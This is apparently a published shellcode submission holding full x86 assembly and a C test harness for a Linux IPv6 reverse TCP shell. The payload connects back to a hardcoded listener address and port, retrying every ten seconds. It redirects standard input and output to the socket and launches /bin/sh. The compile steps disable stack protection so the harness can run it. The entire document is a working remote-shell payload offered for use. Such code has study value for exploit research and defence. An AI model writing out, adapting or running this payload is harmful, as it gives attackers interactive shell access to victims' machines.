/*

# Title: linux x86 reverse tcp (ipv6)
# Date: 22-04-2016
# Exploit Author: Roziul Hasan Khan Shifat
# Tested on: kali 2.0 and Ubuntu 14.04 LTS
# Contact: shifath12@gmail.com

*/

/*
section .text
	global _start
_start:

;;socket()
xor ebx,ebx
mul ebx ;null out eax

push byte 6
push byte 0x1
push byte 10

mov ecx,esp

mov al,102 ;socketcall()
mov bl,1 ;socket()
int 0x80

mov esi,eax ;storing socket descriptor (we know return value of any syscall stores in eax)

xor eax,eax

mov al,2
xor ebx,ebx
int 80h


cmp eax,ebx
je connect
ja exit

;------------------

;------------------------

connect:

xor ecx,ecx
;-------------------------------------------------------
;struct sockaddr_in6
xor ebx,ebx

push dword ebx ;sin6_scope_id 4 byte

push dword 0x8140a8c0 ; only change it to Your ipv4 address (current ipv4 192.168.64.129)

push word 0xffff
push dword ebx
push dword ebx
push word bx ;sin6_addr 16 byte (ipv6 address ::ffff:192.168.64.129)

push dword ebx ;sin6_flowinfo=4 byte

push word 0xc005 ;sin6_port 2 byte (port 1472)

push word 10 ;sa_family_t=2 byte 

;end of struct sockaddr_in6

mov ecx,esp

;--------------------------------------------

;;connect()

push byte 28 ;sizeof ;struct sockaddr_in6

push ecx

push esi

xor ebx,ebx
xor eax,eax
mov al,102
mov bl,3 ;connect()
mov ecx,esp
int 0x80

xor ebx,ebx

cmp eax,ebx
jne retry ;if it fails to connect ,it will  retry to connect to attacker after 10 seconds

;dup2(sd,0)

xor ecx,ecx
mul ecx

mov ebx,esi
mov al,63
int 80h

;dup2(sd,1)

xor eax,eax
inc ecx

mov ebx,esi
mov al,63
int 80h

;;dup2(sd,2)

xor eax,eax
inc ecx

mov ebx,esi
mov al,63
int 80h

;;execve(/bin//sh)

xor edx,edx
mul edx

push edx ;null terminated /bin//sh
push 0x68732f2f
push 0x6e69622f

mov ebx,esp

push edx
push ebx

mov ecx,esp

mov al,11 ;execve()
int 0x80

ret

;------------------------------------------------------

retry:

xor ebx,ebx

push ebx
push byte 10

mul ebx
mov ebx,esp

mov al,0xa2 ;nanosleep()

int 80h

jmp connect

ret

;----------------------------
exit:
xor eax,eax
mov al,1
int 80h

*/


/* 
to compile:

$nasm -f elf filename.s
$ld filename.o
$./a.out

to compile shellcode

$gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$./shellcode

*/


#include<string.h>
#include<stdio.h>
char shellcode[]="\x31\xdb\xf7\xe3\x6a\x06\x6a\x01\x6a\x0a\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc6\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xd8\x74\x02\x77\x77\x31\xc9\x31\xdb\x53\x68\xc0\xa8\x40\x81\x66\x6a\xff\x53\x53\x66\x53\x53\x66\x68\x05\xc0\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x31\xdb\x31\xc0\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xdb\x39\xd8\x75\x36\x31\xc9\xf7\xe1\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xd2\xf7\xe2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\xc3\x31\xdb\x53\x6a\x0a\xf7\xe3\x89\xe3\xb0\xa2\xcd\x80\xeb\x8a\xc3\x31\xc0\xb0\x01\xcd\x80";


int (*exec_shellcode)();
main()
{
printf("Shellcode length: %ld\n",(long)strlen(shellcode));
exec_shellcode=(int(*)())shellcode;
(*exec_shellcode)();

}